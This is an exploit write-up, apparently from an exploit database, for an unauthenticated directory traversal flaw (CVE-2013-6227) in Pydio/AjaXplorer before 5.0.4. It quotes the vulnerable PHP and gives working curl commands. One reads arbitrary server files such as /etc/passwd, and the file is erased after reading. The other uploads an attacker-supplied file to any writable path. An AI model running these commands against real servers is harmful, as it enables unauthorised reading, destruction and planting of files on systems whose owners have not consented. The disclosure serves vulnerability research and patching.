Pydio / AjaXplorer < 5.0.4 - (Unauthenticated) Arbitrary File Upload

  • 作者: _jazz______
    日期: 2019-01-18
  • 类别:
  • 来源:
  • # Exploit Title: Unauthenticated Arbitrary File Upload Vulnerability In Pydio/AjaXplorer 5.0.3 – 3.3.5
    # Date: 01/18/2019
    # Exploit Author: @_jazz______
    # Vendor Homepage:
    # Software Link:
    # Version: ajaXplorer before 5.0.4
    # Tested on: ajaXplorer 4.2.3 on Debian 9 update 5
    # References:
    # CVE: CVE-2013-6227
    Affected file:
    $vars = array_merge($_GET, $_POST);
    if(!isSet($vars["ajxp_action"]) && isset($vars["id"]) && isset($vars["format"])){
    $filezoho = $_FILES['content']["tmp_name"];
    $cleanId = str_replace(array("..", "/"), "", $vars["id"]);
    move_uploaded_file($filezoho, "files/".$cleanId.".".$vars["format"]);
     }else if($vars["ajxp_action"] == "get_file" && isSet($vars["name"])){
    Option 1: If "ajxp_action" is not set, upload "content" file to files/id.format. 
    The code does not sanitize "format" parameter before passing it as an argument to "move_uploaded_file",
    thus introducing an opportunity to upload files to any arbitrary location via directory traversal 
    Note: User should have permission to write on the desired location.
    Option 2: If "ajxp_action" is set to "get_file", read the file from "files/name" and then ERASE IT (unlink). 
    Again, the code does not sanitize the "name" parameter, making it also vulnerable to directory traversal.
    "files" directory's location is by default /plugins/editor.zoho/agent/files
    A default location for reading/uploading files is /data/files/
    [1] [CAUTION!] Read arbitrary files 
    curl "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=<file_relative_path>"
    e.g. curl "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?ajxp_action=get_file&name=../../../../../../../../etc/passwd"
    [USE WITH CAUTION] This is a destructive function. Files retrieved WILL be erased after reading, provided that the file is writable by the user which the web server's process is running as.
    [2] Arbitrary File Upload
    *step 1 - Upload the file to the server* 
    # curl -F 'content=@<filename_from_attacker_host>;type=<filetype>;filename=\"<filename>\"' "http://<url>/<ajaxplorer_wwwroot>/plugins/editor.zoho/agent/save_zoho.php?id=&format=<upload_to_file_relative_path>"
    e.g. # curl -F 'content=@test.html;type=text/html;filename=\"test.html\"' "http://muralito.el.payaso/ajaxplorer/plugins/editor.zoho/agent/save_zoho.php?id=&format=./../../../data/files/test.html"